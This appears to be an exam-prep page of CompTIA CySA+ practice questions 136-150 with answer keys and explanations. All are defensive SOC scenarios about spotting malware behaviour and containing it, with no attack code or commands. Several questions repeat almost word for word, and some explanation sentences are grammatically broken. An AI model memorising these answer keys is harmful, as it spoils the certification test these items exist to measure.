CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 10 Q136-150

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 136

A SOC analyst identifies Linux endpoints repeatedly attempting to connect via Telnet to multiple unknown external IP addresses during off-hours. The traffic originates from undocumented scripts, and standard SSH connections are disabled on the endpoints. What is the most likely threat, and what should the SOC do first?

A) Routine network administration; allow traffic.
 B) Malware establishing legacy remote access or tunneling; isolate endpoints, capture traffic, and analyze scripts.
 C) Misconfigured Telnet settings; update configuration.
 D) User network testing; notify users.

Answer: B)

Explanation:

Option A assumes routine network administration. Legitimate administration uses approved and documented protocols, typically SSH for Linux systems, and follows scheduled, auditable procedures. Telnet is insecure and rarely used for routine administration in modern environments. Off-hours connections from undocumented scripts indicate anomalous activity. Allowing this activity could enable malware to establish remote access, exfiltrate sensitive data, or perform lateral movement. Routine administrative activity is predictable and uses verified tools, making anomalous Telnet connections suspicious.

Option B is correct. Malware sometimes leverages legacy protocols like Telnet to establish remote access and bypass security monitoring. Indicators include off-hours activity, connections to unknown external IPs, execution by undocumented scripts, and disabled standard SSH channels. Immediate SOC response involves isolating the affected endpoints to prevent further compromise, capturing network traffic for analysis, and examining scripts for persistence mechanisms, payloads, and potential command-and-control channels. Correlating traffic with threat intelligence can help identify malicious infrastructure. Remediation includes cleaning endpoints, restoring SSH services with proper security configurations, blocking unauthorized Telnet traffic, and implementing monitoring for similar anomalies. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Ignoring this activity could allow malware to maintain covert access, compromise additional endpoints, and exfiltrate sensitive data.

Option C assumes misconfigured Telnet settings. Misconfigurations usually cause failed connections or connection errors rather than persistent off-hours access attempts from undocumented scripts. Treating this as benign allows malware to operate undetected and persist in the environment.

Option D assumes user network testing. Testing is scheduled, documented, and predictable. Execution of scripts connecting to unknown IPs during off-hours is inconsistent with testing activity. Misclassification risks persistent malware activity, lateral movement, and potential data exfiltration.

Selecting option B ensures rapid containment, forensic analysis, and remediation, maintaining endpoint integrity while preventing unauthorized access. Isolating endpoints and analyzing scripts provides insight into malware behavior, strengthens detection capabilities, and preserves evidence for regulatory and investigative purposes.

Question 137

A SOC analyst observes multiple Windows endpoints attempting repeated unauthorized PowerShell remote sessions to other internal systems during off-hours. These sessions originate from unsigned scripts that attempt credential harvesting. What is the most likely threat, and what is the SOC’s first response?

A) Routine PowerShell administration; allow execution.
 B) Malware performing lateral movement and credential harvesting; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured PowerShell remoting; update configuration.
 D) User testing of PowerShell remoting; notify users.

Answer: B)

Explanation:

Option A assumes routine PowerShell administration. Legitimate administration uses signed scripts, documented schedules, and authorized accounts. Off-hours execution of unsigned scripts attempting remote sessions to multiple internal systems indicates anomalous activity. Allowing this behavior risks malware performing lateral movement, harvesting credentials, and compromising additional systems undetected. Legitimate administrative activity is auditable and follows established protocols.

Option B is correct. Malware frequently leverages PowerShell remoting for lateral movement and credential theft. Indicators include off-hours execution, unsigned scripts, repeated remote sessions, and targeting multiple internal endpoints. Immediate SOC response involves isolating affected endpoints to prevent further lateral movement, capturing memory and script logs for forensic analysis, and analyzing scripts to identify malware behavior, persistence mechanisms, and stolen credentials. Correlation with SIEM and threat intelligence can help identify additional compromised systems. Remediation includes cleaning endpoints, enforcing signed scripts, strengthening authentication policies, updating detection rules for anomalous PowerShell activity, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance and supports post-incident investigation. Ignoring this activity allows malware to spread, escalate privileges, and exfiltrate sensitive data.

Option C assumes misconfigured PowerShell remoting. Misconfigurations typically produce predictable errors and limited impact, unlike off-hours repeated unauthorized remote session attempts. Treating this as benign allows malware to persist and compromise internal systems.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, unsigned scripts performing unauthorized sessions across multiple endpoints are inconsistent with legitimate testing. Misclassification risks persistent malware activity and credential compromise.

Selecting option B ensures containment, forensic analysis, and remediation while protecting internal systems, credentials, and sensitive information.

Question 138

A SOC analyst detects Linux endpoints generating repeated DNS queries for newly registered domains with high-entropy subdomains. The activity occurs outside business hours and is executed by undocumented scripts. What is the most likely threat, and what is the SOC’s first response?

A) Normal DNS resolution; allow queries.
 B) Malware using dynamically generated domains for command-and-control or DNS tunneling; capture traffic, isolate endpoints, and analyze scripts.
 C) Misconfigured DNS services; update configuration.
 D) User testing of DNS services; verify activity with IT.

Answer: B)

Explanation:

Option A assumes normal DNS resolution. Standard DNS queries are predictable, target known domains, and originate from approved processes. Persistent off-hours queries to newly registered domains with high-entropy subdomains indicate anomalous behavior. Allowing this activity could enable malware to exfiltrate data, maintain covert command-and-control communication, or persist undetected. Legitimate DNS activity does not generate high-entropy dynamic subdomains or off-hours repeated queries.

Option B is correct. Malware often uses dynamically generated domains or DNS tunneling for command-and-control communication. Indicators include low-volume persistent queries, dynamically generated high-entropy subdomains, execution by undocumented scripts, and off-hours activity. Immediate SOC response involves capturing DNS traffic for analysis, isolating affected endpoints, and performing endpoint forensics to identify malware behavior and communication mechanisms. Correlating traffic with threat intelligence can help identify malicious domains and infrastructure. Remediation includes cleaning endpoints, updating detection rules for anomalous DNS patterns, and continuous monitoring. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Ignoring this activity could allow persistent malware presence, data exfiltration, and compromise of additional endpoints.

Option C assumes misconfigured DNS services. Misconfigurations typically result in errors or limited resolution failures and do not explain continuous high-entropy queries. Treating this as a benign risk of covert malware activity.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours high-entropy queries from undocumented scripts are inconsistent with legitimate testing and indicate malicious activity. Misclassification allows malware to persist undetected.

Selecting option B ensures containment, forensic analysis, and remediation while safeguarding network integrity and sensitive information.

Question 139

A SOC analyst observes Windows endpoints executing scripts that attempt to disable endpoint detection and response (EDR) software and connect to unknown external IPs during off-hours. The scripts run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative scripts; allow execution.
 B) Malware attempting to bypass security controls and maintain persistence; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured EDR policies; update configuration.
 D) User testing of security software; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative scripts. Legitimate administration is scheduled, documented, and uses approved tools. Scripts that disable EDR, run with elevated privileges, and connect to unknown external IPs are clearly anomalous. Allowing this activity risks persistent malware presence, evasion of security controls, and data exfiltration.

Option B is correct. Malware often attempts to disable endpoint security to evade detection and establish persistence. Indicators include off-hours execution, elevated privileges, unknown scripts, and communication with external IPs. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and potential C2 channels. Remediation includes cleaning endpoints, restoring EDR functionality, updating detection rules, and monitoring for similar activity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Ignoring this activity could allow malware to persist, exfiltrate sensitive data, and compromise additional systems.

Option C assumes misconfigured EDR policies. Misconfigurations typically do not result in elevated scripts disabling protection and connecting externally. Treating this as a benign risk undetected compromise.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours execution of unauthorized scripts affecting security software is inconsistent with testing and indicates malicious behavior. Misclassification could result in persistent malware and continued compromise.

Selecting option B ensures containment, forensic analysis, and remediation while maintaining endpoint security and preventing further compromise.

Question 140

A SOC analyst observes endpoints attempting repeated unauthorized access to sensitive file shares during off-hours. The attempts are executed by unknown processes and affect multiple accounts across several systems. What is the most likely threat, and what is the SOC’s first response?

A) Routine backup or maintenance; allow access.
 B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
 C) Misconfigured file share permissions; update configuration.
 D) Legitimate off-hours testing; notify users.

Answer: B)

Explanation:

Option A assumes routine backup or maintenance. Legitimate activity is scheduled, predictable, uses authorized accounts, and targets approved systems. Off-hours repeated unauthorized access by unknown processes indicates malicious behavior. Ignoring this could allow malware to map the network, perform lateral movement, or exfiltrate sensitive data. Routine maintenance does not cause multi-account unauthorized access attempts.

Option B is correct. Malware frequently probes file shares to perform reconnaissance, lateral movement, or exfiltration. Indicators include off-hours activity, repeated unauthorized access attempts, multi-account targeting, and execution by unknown processes. Immediate SOC response involves isolating affected endpoints, reviewing file access logs, and performing endpoint forensics to identify malicious processes. Correlating activity across SIEM data can reveal compromised accounts and systems. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures regulatory compliance, supports investigation, and informs threat detection strategies. Ignoring this activity could result in persistent malware access, unauthorized lateral movement, and data compromise.

Option C assumes misconfigured file share permissions. Misconfigurations produce predictable errors or isolated access issues, unlike multi-account off-hours access attempts. Treating this as a benign risk continued compromise.

Option D assumes legitimate testing. Testing is scheduled, documented, and predictable. Unauthorized off-hours activity by unknown processes is inconsistent with testing and suggests malicious intent. Misclassification could allow malware to maintain persistent access and exfiltrate data.

Selecting option B ensures immediate containment, forensic analysis, and remediation while protecting file share integrity and preventing unauthorized lateral movement.

Question 141

A SOC analyst observes Linux endpoints executing scripts that attempt to download unsigned binaries from unknown external IPs during off-hours. The processes run with elevated privileges and bypass standard system controls. What is the most likely threat, and what is the SOC’s first response?

A) Routine software updates; allow downloads.
 B) Malware attempting to establish persistence and evade detection; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured package management; update configuration.
 D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine software updates. Legitimate updates are signed, scheduled, documented, and come from approved repositories. Off-hours execution of unsigned binaries from unknown IPs is anomalous and could allow malware to persist, escalate privileges, and exfiltrate data. Ignoring this activity risks compromise of additional endpoints and potential lateral movement across the network. Routine updates generate logs and follow controlled processes, unlike the observed activity.

Option B is correct. Malware often downloads unsigned binaries to establish persistence, evade detection, or deploy additional payloads. Indicators include elevated privileges, off-hours activity, execution by undocumented scripts, and contact with unknown external IPs. Immediate SOC response involves isolating endpoints to prevent further compromise, capturing memory and system logs for forensic analysis, and analyzing scripts to determine malware behavior and persistence mechanisms. Network monitoring and threat intelligence correlation can help identify malicious infrastructure. Remediation includes cleaning endpoints, restoring security configurations, blocking malicious domains, updating detection rules, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and enhances threat intelligence. Ignoring the activity allows malware to maintain persistent access, deploy additional payloads, and exfiltrate sensitive information undetected.

Option C assumes misconfigured package management. Misconfigurations may cause failed downloads or errors, but do not explain off-hours execution of unsigned binaries from unknown IPs. Treating this as benign would leave malware operational.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Execution of unsigned scripts during off-hours is inconsistent with legitimate testing, and misclassification could allow malware to persist and evade detection.

Selecting option B ensures immediate containment, forensic analysis, and remediation while protecting endpoints and sensitive data from persistent malware and potential exfiltration.

Question 142

A SOC analyst identifies multiple Windows endpoints executing obfuscated PowerShell scripts that create hidden scheduled tasks, disable security monitoring, and attempt to download remote payloads. The activity occurs during off-hours. What is the most likely threat, and what is the SOC’s first response?

A) Routine administrative scripts; allow execution.
 B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured task scheduler; update configuration.
 D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative scripts. Legitimate administrative activity is scheduled, documented, signed, and predictable. Off-hours execution of obfuscated scripts, creating hidden scheduled tasks, and disabling security monitoring indicate anomalous behavior. Allowing this activity could allow malware to persist, evade detection, and compromise additional systems. Legitimate scripts do not disable monitoring or download unknown payloads.

Option B is correct. Fileless malware often leverages PowerShell to execute entirely in memory, maintain persistence through hidden scheduled tasks, disable security tools, and download additional payloads. Indicators include off-hours execution, obfuscation, multi-endpoint involvement, and attempts to bypass security monitoring. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware functionality and persistence mechanisms. Network traffic should be monitored for communications with external IPs, and threat intelligence can identify known malicious infrastructure. Remediation includes cleaning affected endpoints, restoring monitoring and task scheduling integrity, updating detection rules, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance and supports post-incident investigation. Ignoring this activity allows malware to maintain access, evade detection, and deploy additional payloads undetected.

Option C assumes a misconfigured task scheduler. Misconfigurations typically generate errors or fail silently and do not explain obfuscated scripts, disabling monitoring or downloading payloads. Treating this as a benign risk, persistent malware activity.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours obfuscated scripts creating hidden tasks and downloading payloads are inconsistent with testing activity. Misclassification allows malware to maintain persistence and evade detection.

Selecting option B ensures rapid containment, forensic analysis, and remediation while protecting system integrity and preventing malware persistence.

Question 143

A SOC analyst observes Linux endpoints performing low-volume, continuous HTTPS requests to newly registered domains with dynamically generated subdomains. The activity occurs outside business hours and originates from undocumented scripts. What is the most likely threat, and what should the SOC do first?

A) Routine telemetry; allow connections.
 B) Malware using dynamically generated domains for command-and-control; isolate endpoints, capture traffic, and analyze scripts.
 C) Misconfigured web services; update configuration.
 D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes routine telemetry. Normal telemetry targets known servers, follows predictable schedules, and originates from approved processes. Low-volume, continuous off-hours requests to newly registered high-entropy subdomains indicate anomalous behavior. Allowing this could enable malware to maintain command-and-control channels, exfiltrate data, and persist undetected. Telemetry does not generate dynamically generated subdomains or off-hours continuous connections.

Option B is correct. Malware commonly uses dynamically generated domains to maintain covert command-and-control communication. Indicators include low-volume continuous traffic, dynamically generated subdomains, off-hours activity, and execution by undocumented scripts. Immediate SOC response involves isolating affected endpoints, capturing network traffic for analysis, and performing endpoint forensics to identify malicious scripts and C2 infrastructure. Threat intelligence can help identify known malicious domains. Remediation includes cleaning endpoints, updating detection rules for anomalous DNS or HTTPS traffic, and monitoring for similar activity across the network. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and enhances threat intelligence. Ignoring this activity allows malware to maintain covert access, exfiltrate data, and compromise additional systems.

Option C assumes misconfigured web services. Misconfigurations produce predictable errors or isolated failures and do not account for off-hours, continuous low-volume traffic to dynamically generated domains. Treating this as a benign risk of covert malware operations.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours execution of undocumented scripts with continuous connections is inconsistent with legitimate testing. Misclassification allows malware to persist and evade detection.

Selecting option B ensures containment, forensic analysis, and remediation while protecting sensitive data and network integrity.

Question 144

A SOC analyst detects Windows endpoints attempting multiple failed logins to sensitive database accounts during off-hours. Unknown processes execute these attempts across multiple accounts. What is the most likely threat, and what is the SOC’s first response?

A) Routine database maintenance; allow activity.
 B) Malware or malicious insider attempting unauthorized access or credential harvesting; isolate endpoints, review logs, and analyze processes.
 C) Misconfigured authentication policies; update configuration.
 D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine database maintenance. Legitimate maintenance is scheduled, predictable, and uses authorized accounts. Repeated failed login attempts across multiple accounts by unknown processes indicate malicious activity. Ignoring this could result in unauthorized access, credential theft, and compromise of sensitive information. Routine maintenance does not trigger multi-account off-hours failed login attempts.

Option B is correct. Malware or a malicious insider may attempt unauthorized access to sensitive accounts for exfiltration or lateral movement. Indicators include off-hours activity, repeated login failures across multiple accounts, and execution by unknown processes. Immediate SOC response involves isolating affected endpoints to prevent further unauthorized access, reviewing authentication logs to identify impacted accounts, and performing endpoint forensics to determine responsible processes or malware. Remediation includes cleaning endpoints, revoking unauthorized access, strengthening authentication policies, updating monitoring rules, and validating account integrity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Failing to respond risks compromise of sensitive financial or operational data and potential regulatory penalties.

Option C assumes misconfigured authentication policies. Misconfigurations produce predictable errors and typically affect limited accounts. Treating this as a benign risk, persistent unauthorized access.

Option D assumes legitimate testing. Testing is scheduled, documented, and predictable. Off-hours repeated failed logins across multiple accounts by unknown processes are inconsistent with testing activity. Misclassification allows unauthorized access attempts to persist.

Selecting option B ensures immediate containment, forensic analysis, and remediation, protecting database integrity and preventing credential compromise.

Question 145

A SOC analyst observes endpoints creating new administrative accounts and modifying group policies during off-hours. Unsigned scripts execute these changes without authorization. What is the most likely threat, and what is the SOC’s first response?

A) Routine administrative changes; allow activity.
 B) Malware attempting privilege escalation and persistent access; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured Active Directory policies; update configuration.
 D) User security testing; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative changes. Legitimate changes are scheduled, documented, logged, and performed by authorized personnel. Unsigned scripts creating new administrative accounts and modifying group policies during off-hours are anomalous. Allowing this activity could enable malware to escalate privileges, maintain persistence, and compromise additional systems. Routine administrative changes are predictable and auditable, unlike unauthorized scripts.

Option B is correct. Malware often creates accounts and modifies group policies to gain persistent access and evade detection. Indicators include off-hours execution, elevated privileges, unsigned scripts, and undocumented changes in Active Directory. Immediate SOC response involves isolating endpoints to prevent further compromise, capturing memory and directory logs for forensic analysis, and analyzing scripts to understand malware behavior and persistence mechanisms. Correlating activity with SIEM data can identify impacted accounts and systems. Remediation includes removing unauthorized accounts, restoring group policies, cleaning endpoints, and updating monitoring rules. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and informs threat detection strategies. Ignoring this activity allows malware to establish long-term control, exfiltrate sensitive data, and pivot across the network.

Option C assumes misconfigured Active Directory policies. Misconfigurations typically produce limited errors or access issues and do not explain off-hours unauthorized account creation and policy changes. Treating this as a benign risk, persistent malware activity.

Option D assumes user security testing. Testing is scheduled, documented, and predictable. Unsigned scripts modifying accounts and policies during off-hours are inconsistent with testing activity. Misclassification allows malware to persist and evade detection.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining directory integrity.

Question 146

A SOC analyst detects multiple Windows endpoints initiating outbound RDP connections to unknown external IPs during off-hours. Unsigned scripts execute these connections and attempt privilege escalation. What is the most likely threat, and what is the SOC’s first response?

A) Routine remote administration; allow connections.
 B) Malware establishing remote access and lateral movement; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured RDP settings; update configuration.
 D) User security testing; notify users.

Answer: B)

Explanation:

Option A assumes routine remote administration. Legitimate administration uses known IPs, follows schedules, and employs documented tools. Off-hour, unsigned scripts attempting RDP connections to unknown external IPs with privilege escalation attempts are anomalous. Allowing this behavior could enable malware to establish remote access, compromise credentials, and perform lateral movement across the network. Legitimate administration is auditable, predictable, and uses signed tools.

Option B is correct. Malware frequently uses RDP to establish remote access and enable lateral movement. Indicators include off-hours activity, connections to unknown external IPs, execution by unsigned scripts, and privilege escalation attempts. Immediate SOC response involves isolating endpoints to prevent lateral movement, capturing memory for forensic analysis, and analyzing scripts to determine malware behavior and persistence. Network traffic should be monitored, and threat intelligence can help identify malicious IPs. Remediation includes cleaning endpoints, restoring security configurations, updating firewall and monitoring rules, and scanning the network for additional compromises. Preserving forensic evidence ensures regulatory compliance and supports incident investigation. Ignoring this activity allows malware to persist, escalate privileges, and exfiltrate sensitive data.

Option C assumes misconfigured RDP settings. Misconfigurations cause limited connectivity issues and do not explain off-hours script execution targeting unknown IPs. Treating this as s benign risk of malware persistence.

Option D assumes user security testing. Testing is scheduled, documented, and predictable. Off-hour, unsigned scripts attempting RDP connections and privilege escalation are inconsistent with legitimate testing. Misclassification risks persistent malware activity.

Selecting option B ensures containment, forensic analysis, and remediation while protecting endpoints and credentials.

Question 147

A SOC analyst identifies Linux endpoints generating low-volume HTTPS requests to newly registered domains with high-entropy subdomains during off-hours. The activity originates from undocumented scripts. What is the most likely threat, and what is the SOC’s first response?

A) Normal telemetry; allow traffic.
 B) Malware using dynamically generated domains for command-and-control; isolate endpoints, capture traffic, and analyze scripts.
 C) Misconfigured web services; update configuration.
 D) User testing; verify with IT.

Answer: B)

Explanation:

Option A assumes normal telemetry. Legitimate telemetry occurs at scheduled intervals, uses known domains, and originates from approved processes. Low-volume, continuous HTTPS requests to newly registered high-entropy subdomains outside business hours are anomalous. Allowing this traffic could enable malware to maintain command-and-control channels, exfiltrate data, and persist undetected. Telemetry does not generate dynamically generated subdomains or off-hours continuous traffic.

Option B is correct. Malware commonly uses dynamically generated domains for covert command-and-control communication. Indicators include low-volume persistent traffic, high-entropy dynamic subdomains, off-hours activity, and execution by undocumented scripts. Immediate SOC response involves isolating affected endpoints, capturing network traffic for analysis, and performing endpoint forensics to identify malicious scripts and infrastructure. Threat intelligence can help identify malicious domains. Remediation includes cleaning endpoints, updating detection rules for anomalous DNS or HTTPS activity, and monitoring for similar behavior. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and improves threat intelligence. Ignoring the activity allows malware to persist and potentially exfiltrate sensitive data undetected.

Option C assumes misconfigured web services. Misconfigurations result in predictable errors or isolated failures and do not explain persistent high-entropy traffic from unknown scripts. Treating this as a risk of undetected malware operations.

Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hour, undocumented scripts generating continuous high-entropy requests are inconsistent with legitimate testing, allowing malware to evade detection.

Selecting option B ensures containment, forensic analysis, and remediation while protecting network integrity and sensitive information.

Question 148

A SOC analyst observes endpoints repeatedly attempting unauthorized access to sensitive file shares during off-hours. Unknown processes target multiple accounts across several systems. What is the most likely threat, and what is the SOC’s first response?

A) Routine backup or maintenance; allow activity.
 B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
 C) Misconfigured file permissions; update configuration.
 D) Legitimate off-hours testing; notify users.

Answer: B)

Explanation:

Option A assumes routine backup or maintenance. Backup activity is predictable, scheduled, and uses authorized accounts. Repeated unauthorized access by unknown processes is anomalous. Ignoring this activity could allow malware to map the network, perform lateral movement, and exfiltrate sensitive information. Routine backups do not trigger multi-account unauthorized access attempts.

Option B is correct. Malware often probes file shares for reconnaissance, lateral movement, or exfiltration. Indicators include off-hours activity, repeated failed or unauthorized access attempts, multi-account targeting, and execution by undocumented processes. Immediate SOC response involves isolating affected endpoints, reviewing file access logs, and performing endpoint forensics to identify malicious processes. Correlating events across SIEM data can reveal additional impacted accounts and systems. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Failing to respond could result in persistent unauthorized access, lateral movement, and potential data exfiltration.

Option C assumes misconfigured file permissions. Misconfigurations usually generate isolated access errors and do not explain repeated multi-account off-hours attempts. Treating this as benign allows malware to persist.

Option D assumes legitimate testing. Testing is scheduled, documented, and predictable. Off-hours repeated unauthorized access by unknown processes is inconsistent with testing and indicates malicious activity. Misclassification could allow malware to maintain persistence and compromise data.

Selecting option B ensures immediate containment, forensic analysis, and remediation while protecting file share integrity and preventing lateral movement.

Question 149

A SOC analyst observes endpoints executing scripts that attempt to disable endpoint detection and response (EDR) software and connect to unknown external IPs during off-hours. The scripts run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative scripts; allow execution.
 B) Malware attempting to bypass security controls and establish persistence; isolate endpoints, capture memory, and analyze scripts.
 C) Misconfigured EDR policies; update configuration.
 D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative scripts. Legitimate administration is scheduled, documented, and uses approved tools. Scripts that disable EDR, run with elevated privileges, and contact unknown IPs are anomalous. Ignoring this activity risks persistent malware, evasion of security monitoring, and data compromise.

Option B is correct. Malware often attempts to disable endpoint security to evade detection and maintain persistence. Indicators include elevated privilege execution, off-hours activity, unknown scripts, and communication with unknown external IPs. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and potential command-and-control channels. Remediation includes cleaning endpoints, restoring EDR functionality, updating detection rules, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and informs threat intelligence. Ignoring this activity allows malware to persist, exfiltrate data, and compromise additional endpoints.

Option C assumes that unusual activity involving elevated scripts bypassing endpoint detection and response (EDR) protections is caused by misconfigured EDR policies. While EDR misconfigurations can occur—such as overly permissive rules, incorrect agent deployment, or misapplied exclusions—these typically result in predictable outcomes, such as alerts being missed, certain applications being allowed to run, or minor gaps in coverage. Misconfigured policies usually do not explain the execution of elevated scripts that actively bypass security protections, modify system configurations, or communicate with external hosts in an unauthorized manner. Such behavior is deliberate, controlled, and outside the scope of what standard misconfigurations would produce. Misclassifying this activity as benign can leave a system vulnerable to undetected compromise, allowing attackers or malware to persist on endpoints while avoiding detection mechanisms.

EDR solutions are specifically designed to monitor and prevent unauthorized execution, privilege escalation, and malicious network communications. When a script elevates privileges, disables security controls, or establishes external communications despite EDR protections, it demonstrates behavior inconsistent with standard misconfigurations. This type of activity is a strong indicator of malicious intent, often associated with advanced persistent threats, ransomware, or other sophisticated malware. Attackers may use obfuscated scripts, code injection, or other evasion techniques to bypass security controls, allowing them to operate stealthily and maintain persistence across the network. Treating these incidents as configuration errors rather than potential compromise risks enables continued unauthorized access, data exfiltration, or the preparation for additional attacks.

Option D assumes that off-hours activity, such as the execution of unauthorized scripts, can be attributed to legitimate user testing. In enterprise environments, testing is normally scheduled, documented, and executed in a controlled manner. Legitimate testing follows predefined procedures, occurs at approved times, and impacts only authorized endpoints or applications. Off-hours execution of unauthorized scripts that interact with security software—particularly scripts designed to disable protections, alter configurations, or communicate externally—is highly inconsistent with routine testing practices. Such activity cannot be justified as part of a legitimate test, as it bypasses established policies and represents a significant deviation from predictable, documented behavior.

Misclassifying this type of activity as legitimate testing carries serious security risks. Malware or attackers frequently mimic routine operations, running scripts during periods of low monitoring to evade detection. These scripts can disable endpoint protections, install backdoors, collect credentials, or prepare the environment for further compromise. By assuming off-hours script execution is benign, organizations risk allowing persistent malware to remain undetected, giving attackers the ability to maintain access, propagate laterally, and compromise additional systems. The longer such activity goes uninvestigated, the greater the potential damage, including data exfiltration, system downtime, or full-scale network compromise.

Effective response requires verification, investigation, and correlation of anomalous activity with documented operational practices. Security teams must examine logs, network communications, and endpoint processes to determine whether scripts were authorized and whether EDR protections were bypassed intentionally or maliciously. Behavioral baselines and threat intelligence can help distinguish legitimate administrative actions from malicious activity.

While misconfigured EDR policies or routine user testing could explain minor anomalies, neither scenario accounts for the off-hours execution of elevated, unauthorized scripts affecting security software and communicating externally. These behaviors are inconsistent with benign misconfigurations or legitimate testing and strongly indicate malicious intent. Treating such activity as harmless risks persistent malware operations, lateral movement, and further compromise. Verification, monitoring, and timely remediation are essential to identify unauthorized activity, protect endpoints, and maintain the integrity of network security.

Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security.

Question 150

A SOC analyst observes Linux endpoints performing repeated low-volume ICMP requests to unknown external IPs during off-hours. The traffic originates from undocumented scripts. What is the most likely threat, and what should the SOC do first?

A) Routine network monitoring; allow traffic.
 B) Malware performing reconnaissance or preparing for denial-of-service; isolate endpoints, capture traffic, and analyze scripts.
 C) Misconfigured ICMP settings; update configuration.
 D) User network testing; notify users.

Answer: B)

Explanation:

Option A assumes routine network monitoring. Legitimate ICMP traffic comes from authorized monitoring tools, follows predictable schedules, and targets known hosts. Off-hours low-volume ICMP requests to unknown external IPs from undocumented scripts are anomalous. Allowing this activity risks malware performing network reconnaissance, mapping external networks, or preparing for denial-of-service attacks. Routine monitoring does not generate off-hours anomalous ICMP traffic.

Option B is correct. Malware often uses ICMP for reconnaissance or network mapping. Indicators include off-hours activity, repeated ICMP requests to unknown IPs, low-volume but continuous traffic, and execution by undocumented scripts. Immediate SOC response involves isolating affected endpoints, capturing network traffic for analysis, and performing process forensics to identify malicious activity. Correlation with threat intelligence can help identify potential attacker infrastructure. Remediation includes cleaning endpoints, updating detection rules for anomalous ICMP traffic, and monitoring network segments for similar behavior. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and improves threat intelligence. Ignoring the activity could allow malware to gain situational awareness, plan further attacks, and compromise network assets.

Option C assumes that unusual off-hours ICMP activity is caused by misconfigured ICMP settings on network devices or hosts. While misconfigurations of ICMP are not uncommon—such as improperly set firewall rules, disabled or misrouted ping responses, or incorrect rate-limiting—these issues generally result in predictable and easily identifiable patterns. For instance, misconfigured ICMP settings may produce occasional unreachable messages, packet loss, or error logs when pings fail or exceed configured thresholds. These behaviors are usually isolated, affecting specific devices or subnets, and are limited in scope. They do not typically explain repeated or sustained activity occurring outside normal operational hours.

In contrast, repeated off-hours ICMP traffic may indicate more deliberate behavior, such as reconnaissance or the preparation for a larger attack. ICMP is often used by attackers to map networks, verify host availability, or probe firewall and security configurations. Persistent ICMP queries during periods of low monitoring, like nights or weekends, can allow malicious actors to collect information about system topology, active hosts, and potential targets while avoiding detection. Treating such activity as a benign misconfiguration can allow an attacker to continue reconnaissance undetected, potentially laying the groundwork for more significant compromises, such as lateral movement, privilege escalation, or malware deployment. Misclassification based on the assumption of misconfiguration ignores the context of timing, frequency, and potential intent, leaving a window of opportunity for adversaries to exploit the network.

Option D assumes that off-hours ICMP traffic originates from legitimate user network testing. In practice, network testing is generally scheduled, documented, and executed in a controlled manner. Testing activities are predictable, involve known endpoints, and are often part of routine maintenance or network troubleshooting procedures. They do not typically generate low-volume, repeated ICMP traffic from undocumented scripts or unknown accounts, nor do they occur at unscheduled off-hours without administrative oversight. Off-hours ICMP traffic generated from scripts that are not documented and not approved is inconsistent with legitimate testing practices. Such behavior can indicate the presence of malware or unauthorized automation performing network scanning, probing, or monitoring to evade detection while establishing persistence.

Misclassifying this activity as legitimate testing presents significant security risks. Malicious actors often mimic benign behaviors, such as ICMP requests, to blend in with normal network traffic. Low-volume, persistent ICMP probes are a common tactic used by malware and advanced persistent threats (APTs) to silently gather information, identify vulnerabilities, and maintain stealthy communication with compromised systems. By assuming that off-hours ICMP activity is routine testing, organizations may fail to investigate these anomalies, allowing attackers to operate unobserved, escalate access privileges, or move laterally across the network. Over time, this can result in broader compromise, sensitive data exposure, and a higher difficulty in containment and remediation.

